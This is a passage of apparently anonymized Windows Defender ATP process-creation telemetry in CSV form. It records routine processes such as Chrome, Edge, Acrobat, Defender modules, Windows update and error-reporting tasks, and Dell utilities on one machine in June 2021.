00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:26:00.649511900+00:00,2021-06-24 02:27:48.178681100+00:00,a0effb41-bee0-454e-9483-1d054a70bb31,computerpii_0a470890c60768167990033d701e7bd881398861,173313,False,10.7740.19041.1052,False,11540474045175158,,11540474045176002,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+629,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:26:17.621723500+00:00,12588,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:26:18.185605100+00:00,2021-06-24 02:27:48.179250200+00:00,a5e46150-e6e4-44cb-8ff7-a3cf8cefd6b3,computerpii_0a470890c60768167990033d701e7bd881398861,173324,False,10.7740.19041.1052,False,11540474045175164,,11540474045176004,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+630,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:26:39.175165500+00:00,1760,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""4868"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:26:39.192015300+00:00,2021-06-24 02:27:48.179684+00:00,f8dc9e38-31c5-4684-8f94-2b97638b0be3,computerpii_0a470890c60768167990033d701e7bd881398861,173334,False,10.7740.19041.1052,False,11540474045137006,,11540474045176007,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+631,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:27:12.336211100+00:00,10244,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9036 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:27:12.388028200+00:00,2021-06-24 02:27:48.179945100+00:00,cb9ccb69-fa46-431e-bb8a-3f2ac9091012,computerpii_0a470890c60768167990033d701e7bd881398861,173341,False,10.7740.19041.1052,False,11540474045175164,,11540474045176008,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+632,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:25:57.801738100+00:00,21312,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_a32eb1d09d4856b046b027aaf7aa6a8522204c6a.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:25:57.982600500+00:00,2021-06-23 06:27:22.525931900+00:00,1f30eaf0-0bf4-4246-ad52-1af90341649e,computerpii_0a470890c60768167990033d701e7bd881398861,163974,False,10.7740.19041.1052,False,11540474045171845,,11540474045173827,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+633,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:22.063510+00:00,2928,wermgr.exe,wermgr.exe -upload,PortableExecutable,2021-06-09 01:20:48.990190700+00:00,C:\Windows\System32\wermgr.exe,228664,9e589e1cc3656da4013dd6effb304cc9,8ff10133fa972e400bc6b8a4ce92b55326fea4f99d1d9eb3331fdab85289b9ed,00e57965ce237ded3b414379d0e6a22ec09375d2,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:22.291409800+00:00,2021-06-24 00:53:26.842167800+00:00,8fb33e87-8d01-499b-afb3-f28c0279f5f2,computerpii_0a470890c60768167990033d701e7bd881398861,167559,False,10.7740.19041.1052,False,11540474045136925,,11540474045175097,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,WerMgr,WerMgr,Windows Problem Reporting
+634,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:22.473414900+00:00,3496,taskhostw.exe,"taskhostw.exe ""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:22.519210200+00:00,2021-06-24 00:53:26.842508800+00:00,0f5a104e-238c-4bf0-ba92-d4e45d44f60d,computerpii_0a470890c60768167990033d701e7bd881398861,167563,False,10.7740.19041.1052,False,11540474045136925,,11540474045175098,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+635,False,Low,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:32.497592400+00:00,9256,SenseNdr.exe,SenseNdr.exe **deleted**,PortableExecutable,2021-05-12 01:12:27.146327600+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe,423936,06319ee6f2131a4187c72dafd56dc947,67016d5a77daa2f687efab640996986cf3305a562437c66391f1c64ebe3034c5,a654f18acc7577020e86245b412030c8f9f984ec,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:33.372821200+00:00,2021-06-24 00:53:26.845442200+00:00,b76dc614-2217-4930-a376-5b06cc52aa8d,computerpii_0a470890c60768167990033d701e7bd881398861,167599,False,10.7740.19041.1052,False,11540474045137006,,11540474045175101,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseNdr.exe,SenseNdr.exe,Windows Defender Advanced Threat Protection - Sense NDR module
+636,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:48.961881700+00:00,20216,SenseCncProxy.exe,3888,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:49.088800600+00:00,2021-06-24 00:53:26.845596500+00:00,9db5b3fe-ed39-4341-ab5b-4334715675de,computerpii_0a470890c60768167990033d701e7bd881398861,167601,False,10.7740.19041.1052,False,11540474045137006,,11540474045175102,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,2176,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+637,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:51:51.336941600+00:00,7288,SIHClient.exe,sihclient.exe  /cv ZFIkgC4zJkO2Lw+b//i4Dg.0.1,PortableExecutable,2021-04-14 01:10:32.937492400+00:00,C:\Windows\System32\SIHClient.exe,361056,fb01bf59d3dcf61f005b1cb038046d2f,8f0d59f251400d5897523658666b7ca2c497f69b034e71e8bd44065de07ae1bf,b15a31de350b8312868f2f2d9ed3973a7c34f9ac,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:51:21.258434400+00:00,11356,upfc.exe,Upfc.exe /launchtype periodic /cv ZFIkgC4zJkO2Lw+b//i4Dg.0,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:51:51.644047500+00:00,2021-06-24 00:53:26.845765300+00:00,ce8d4f28-f532-42d3-8220-ac505e8f542d,computerpii_0a470890c60768167990033d701e7bd881398861,167603,False,10.7740.19041.1052,False,11540474045175091,,11540474045175103,2021-06-24 00:51:21.258434400+00:00,11356,2021-06-24 00:51:21.258434400+00:00,\Device\HarddiskVolume3\Windows\System32\upfc.exe,11356,128,TerminateProcessStartkey,C:\Windows\System32,121392,1973-05-29 11:25:14+00:00,2019-12-07 09:08:33.284887700+00:00,2021-06-24 00:51:21.260994600+00:00,2019-12-07 09:08:33.284887700+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,SIH Client,sihclient.exe,SIH Client
+638,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.279211200+00:00,9228,Apoint.exe,"""Apoint.exe""",PortableExecutable,2019-11-05 04:39:30+00:00,C:\Windows\System32\DellTPad\Apoint.exe,1191312,9ef88ac7a2ed348523e395f4e3827d8c,b218973dd5617ff3bc3a0471ec20a5e93ecf75df3e72c85bc7d29b316888b13b,f733c65da25910c9ba28c2c6529fdceb447a8270,e94c1b8e09bba1b5ab5f9a7b903de3d4,4a828b839efd6088a9d015cd9491061455172ac87e6c26b1a1b29aa827edac93,961ea5e1770e2dfa1f82bca6e04e6aa4f295ee02,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.803639100+00:00,4428,HidMonitorSvc.exe,HidMonitorSvc.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.404909900+00:00,2021-06-24 00:53:26.847984900+00:00,2d3567c4-22bc-45ec-a10f-c01eeaf207ad,computerpii_0a470890c60768167990033d701e7bd881398861,167629,False,10.7740.19041.1052,False,11540474045136984,,11540474045175105,2021-06-10 00:46:11.803639100+00:00,4428,2021-06-10 00:46:11.803639100+00:00,\Device\HarddiskVolume3\Windows\System32\DellTPad\HidMonitorSvc.exe,4428,128,ActiveProcessStartkey,C:\Windows\System32\DellTPad,867216,2019-06-29 01:43:49+00:00,2019-11-05 04:39:34+00:00,2021-06-10 00:46:11.805074600+00:00,2019-11-05 04:39:34+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,"Alps Electric Co., Ltd.",HidMonitorSvc Application,8.1.3.144,HidMonitorSvc,HidMonitorSvc.exe,HidMonitorSvc Application,"Alps Electric Co., Ltd.",Alps Pointing-device Driver,10.1.102.555,Alps Pointing-device Driver,Apoint.exe,Alps Pointing-device Driver
+639,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:12.380643100+00:00,17316,DPM.exe,"""DPM.exe"" -LaunchAsHelper -LogFileName=DPM-Helper",PortableExecutable,2021-05-18 18:40:12+00:00,C:\Program Files\Dell\Dell Peripheral Manager\DPM.exe,15820280,9f5e0af77515966211006ba1faf992cf,71a938dcd7832b8a7b6cd67554f83a90b81bdcef98e1362af86a2344b412a642,af168dfd85d18d03083464e5d6112c00d2bacdea,97afe1b8859c5e7862a7ca6c971c74df,fa5314e93650999193c4eee122b6482f921d2d30db88f16ce39032f03b733af4,d7c795b55dbf276f91a9f28df6cc8562b467535b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-15 01:05:19.778381100+00:00,11792,DPMService.exe,"""DPMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:12.409918100+00:00,2021-06-24 00:53:26.849735900+00:00,f31ef719-a482-4753-aba7-6b9fb1d6bf54,computerpii_0a470890c60768167990033d701e7bd881398861,167654,False,10.7740.19041.1052,False,11540474045147970,,11540474045175106,2021-06-15 01:05:19.778381100+00:00,11792,2021-06-15 01:05:19.778381100+00:00,\Device\HarddiskVolume3\Program Files\Dell\Dell Peripheral Manager\DPMService.exe,11792,128,ActiveProcessStartkey,C:\Program Files\Dell\Dell Peripheral Manager,1688056,2021-05-18 18:32:07+00:00,2021-05-18 18:40:14+00:00,2021-06-15 01:05:12.297854100+00:00,2021-05-18 18:40:14+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Dell Inc.,Dell Peripheral Manager,1.4.0,DPMService.exe,DPMService.exe,Dell Peripheral Manager Service,Dell Inc.,Dell Peripheral Manager,1.4.0,DPM.exe,DPM.exe,Dell Peripheral Manager Application
